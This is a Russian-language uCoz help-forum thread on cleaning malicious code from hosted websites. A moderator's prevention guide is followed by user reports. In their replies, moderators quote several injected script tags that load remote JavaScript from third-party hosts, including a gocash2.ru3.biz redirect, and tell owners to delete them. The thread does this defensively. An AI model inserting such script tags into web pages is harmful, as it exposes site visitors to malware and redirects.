Сообщение # 1 |
22:08:04
21 Июн 2010
Как предотвратить попадание вредоносных ссылок на сайт - Первое и самое главное - это запрещать использование у вас на сайте HTML тегов для всех групп пользователей, кроме администратора.
- Запретить BB коды в чате всем группам пользователей, запрещать использование BB-коды [url]и [img], так же можно запретить использование BB кодов в гостевой и комментариях.
- В комментариях, гостевой книге, на форуме и в мини-чате запрещать функцию Автоматически делать ссылками www и email адреса
- Всегда помнить, что тег iframe считается потенциально опасным, и быть очень осторожным при вставке партнерок и рекламных блоков через iframe. На юкозе используются два ифрейма: это рекламный баннер и мини-чат. Это безопасные ифреймы.
- Очень осторожно выбирать баннерные сети партнерки с рекламными блоками на сайт.
Диагностика - Если случилось так, что ваш антивирус или антивирусы ваших пользователей "реагируют" на ваш сайт, а так же если браузер Mozilla Firefox ставит заглушку-предупреждение на ваш сайт, а Google в выдаче метит ваш сайт, как тот, который может нанести вред вашему компьютеру, а вебмастер Яндекса высылает вам предупреждение о том, что ваш сайт заражён...
В первую очередь нужно ознакомиться с аллертами антивируса. Большинство антивирусов выдают достаточно полную информацию о блокировке того или иного объекта на сайте, так же заглушка Firefox-а и вебмастер Google и Яндекса имеют описания вредоносного кода обнаруженного у вас на сайтеБывает так, что ваш сайт не заражен, а мог быть заражен сайт, который крутится у вас в рекламе (чаще всего такое случается с баннерными сетями или партнерками по обмену трафиком ), тем не менее вы можете получить аллерт антивируса. Сложность диагностики таких аллертов состоит в том, что баннеры и сайты подгружаемые кодом подобных партнерок могут постоянно меняться. Если вредоносный код обнаруживается у вас на сайте, тогда поисковики могут наложить фильтр на ваш сайт. Выглядит это так, что в выдаче под ссылкой на ваш сайт будет предупреждение о том, что сайт может нанести вред вашему компьютеру, а браузер Mozilla Firefox или Google Chrome или Opera будет при этом выдавать заглушку - предупреждение. В этом случае даже если сайт будет полностью очищен от вредоносного кода такие фильтры и заглушки могут висеть ещё очень долго. Чем быстрее будет очищен сайт - тем быстрее будет снят фильтр, а так же заглушки с браузеров - Если ваш сёрфинг по интернету сопровождается постоянной навязчивой рекламой, если вы на многих сайтах видите одну и ту же рекламу и видите её только вы (другие пользователи не наблюдают подобных отклонений), если вы пишете сообщения на форумах, чатах, гостевых и т.д и в ваши сообщения встраиваются посторонние ссылки или рекламные объявления, то есть если у вас сходные отклонения не на одном, а на целой серии различных сайтов, то стоит очистить свой компьютер от вирусов.
- Если вдруг у вас на сайте появилось всплывающее окно, что-то на подобии формы входа, где нужно ввести логин и пароль, то естественно свои данные вводить не стоит, а стоит присмотреться к всплывающему окну, а именно к его адресу или заголовку. Адрес или заголовок такого окна всегда отличен от адреса и заголовка вашего сайта.
Для поиска транслятора всплывающего окна нужно проверить все модули, где у вас разрешен BB код для пользователей. Чаще всего подобное подсаживают через мини-чат с разрешенными BB-кодами в нем. Ваша задача найти инородную картинку (чаще всего смайлик)
Правила подачи заявки на диагностику и поиск вредоносного кода на сайте - Вы должны предоставить ссылку на сайт!
- Вы должны дать описание проблемы:
1) на какой странице сайта обнаруживается проблема (ссылка)
2) проблема обнаруживается только под логином или под гостем тоже
3) если реагирует антивирус, то назовите свой антивирус, и предоставьте текст или четкий скриншот блокировки
4) если сайт блокируется браузером, то назовите свой браузер и предоставьте текст блокировки
Полезные ссылки: Так как большинство случаев заражения сайтов является плодом неумелого обращения с готовыми скриптами, а так же с готовыми элементами дизайна для сайтов найденными в сети, то перед тем как внедрить на сайт найденный в сети скрипт стоит ознакомиться со следующими темами:
Сообщение от Модератор форума
|
ExtrimKH
Сообщений: 2
Сообщение # 166 |
18:58:15
19 Июн 2013
Да сайт очищал бестолку... всё что могло носить вирус удалил, картинки которые на сайте проверил антивирусом чистые...
Пишу потому что хочу помощи... так может быть что антивирусники блокируют из-за рекламы юкоза?!
|
karim8510
Сообщений: 1
Сообщение # 167 |
12:52:08
21 Июн 2013
|
giza-174
Сообщений: 10
Сообщение # 168 |
13:12:16
21 Июн 2013
1)http://samosvalych.at.ua/ на всех страницах
2) Проблема обнаруживается под логинами и под гостями
3) AVAST Детали заражения:
URL:http://c97e7b7f82b097473085cda5837148371...Процесс:C:\Program Files\Internet Explorer\iexpl...Инфекция:URL:Mal
|
bandjuk
Сообщений: 6816
Уровень замечаний:
Сообщение # 169 |
13:22:29
21 Июн 2013
giza-174, в блоке радио удаляй:
<script language="JavaScript" src="http://101widgets.com/02000219/170/175"></script>
П.С. а что это за прикол в самом низу?
Код
User-agent: Yandex
Disallow:
HOST: samosvalych.at.ua
User-agent: Googlebot
Disallow:
|
akula-z
Сообщений: 214
Сообщение # 170 |
14:42:32
21 Июн 2013
Добрый день.
У меня сегодня все время на сайтах юкоз ругается антивирус. Пишет, что обнаружен фишинг.
Вот скрин 
|
webanet
Сообщений: 24067
Сообщение # 171 |
15:41:47
21 Июн 2013
karim8510, из формы поиска удалить скрипт
Код <script language='javascript' type='text/javascript' src='http://u.to/Hd1xAw'></script>
|
giza-174
Сообщений: 10
Сообщение # 172 |
17:46:15
21 Июн 2013
А че он тогда смеется надо мной? И че с вирусом делать то?Добавлено (21 Июн 2013, 17:46:15)
---------------------------------------------
И спам выскакивает и не убирается типа от яндекса. Вы давайте уже помогите чем нибудь!
|
webanet
Сообщений: 24067
Сообщение # 173 |
17:55:15
21 Июн 2013
giza-174, Цитата giza-174, в блоке радио удаляй:
<script language="JavaScript" src="http://101widgets.com/02000219/170/175"></script>
он совершенно верно указал, что вам следует удалить. но вы не читаете. удалите этот скрипт и проблемы со спамом типа от яндекса сразу исчезнет. и больше скрипты с этого сайта не берите
|
giza-174
Сообщений: 10
Сообщение # 174 |
17:57:20
21 Июн 2013
Удалил, все нормально работает спасибо!
|
Irina6209
Сообщений: 1
Сообщение # 175 |
17:57:30
21 Июн 2013
Добрый день! Заранее прошу прощения если мой вопрос не по теме или глупый. Просто не могу зайти на свой сайт, englishteacher.at.ua написала здесь на форум, мне ответили что уровень репутации был понижен, она составляет -4. Я обычный пользователь, и про репутацию узнала сегодня, подскажите пожалуйста что это значит? как она понизилась? и можно ли её повысить теперь? если да, то как? Очень жалко сайт, я с таким трудом его создавала, т.к. не являюсь продвинутым пользователем. Пожалуйста помогите.
|
webanet
Сообщений: 24067
Сообщение # 176 |
18:57:33
21 Июн 2013
Irina6209, вы удивительно неудачно выбираете темы для своих вопросов, которые слепленывсеводнукучу
поясните внятно что такое не можете зайти на свой сайт. вас перекидывает на чужой при попытке зайти или что-то другое? но скорее всего перекидывает. зайдите по этой ссылке в панель управления сайтом http://englishteacher.at.ua/admin для входа введите пароль администратора вебтопа. или зайдите в вебтоп и из папки мои сайты перейдите в панель управления. напротив сайта с адресом http://englishteacher.at.ua/ есть кнопочка пу. просто нажмите на неё и попадете в панель управления. дальше вам надо очистить сайт от вредоносного кода
панель управления - дизайн - управление дизайном - быстрая замена - в поле что заменить вставляете скрипт
Код <script language="javascript" src="http://gocash2.ru3.biz/js/back.php?id=54"></script>
поле на что заменить оставляете пустым и производите замену во всех модулях
после очистки вам нужно обязательно изменить пароль uID профиля, которым администрируете сайт. инструкция по изменению пароля находится тут //forum.ucoz.ru/forum/45-52299-1
думаю, что после всех манипуляций вы сможете зайти на сайт
|
DRedd
Сообщений: 13
Сообщение # 177 |
17:24:00
22 Июн 2013
vipzal.tv
Сообщение отредактировал DRedd - Суббота, 22 Июн 2013, 17:24:29
|
webanet
Сообщений: 24067
Сообщение # 178 |
17:43:16
22 Июн 2013
DRedd, все время блокирует или периодически? проблема в рекламе.
попробуйте на время снять
Код <script type="text/javascript" src="http://am15.net/bn.php?s=14078&f=3&d=17938"></script>
после удаления нужно сбросить кеш браузера и понаблюдать за шевелениями антивируса со снятой рекламой
|
DRedd
Сообщений: 13
Сообщение # 179 |
18:07:10
22 Июн 2013
переодически, окей спасибо большое попробуем 
|
qaziks
Сообщений: 1
Сообщение # 180 |
10:47:07
23 Июн 2013
При входе на tex37.ucoz.ru перекидывает на gocash.ru3.biz
Браузер яндекс
Сайт tex37.ucoz.ru
может угрожать безопасности вашего компьютера.
Страница сайта tex37.ucoz.ru пытается загрузить данные с заражённого сайтаgocash.ru3.biz. По нашим данным, на gocash.ru3.biz был размещён вредоносный программный код. Это могло произойти как по желанию владельцев сайта, так и без их ведома — в результате действий злоумышленников.
Более подробную информацию об угрозе или безопасную копию сайта можно посмотреть на
|
Чат сообщества
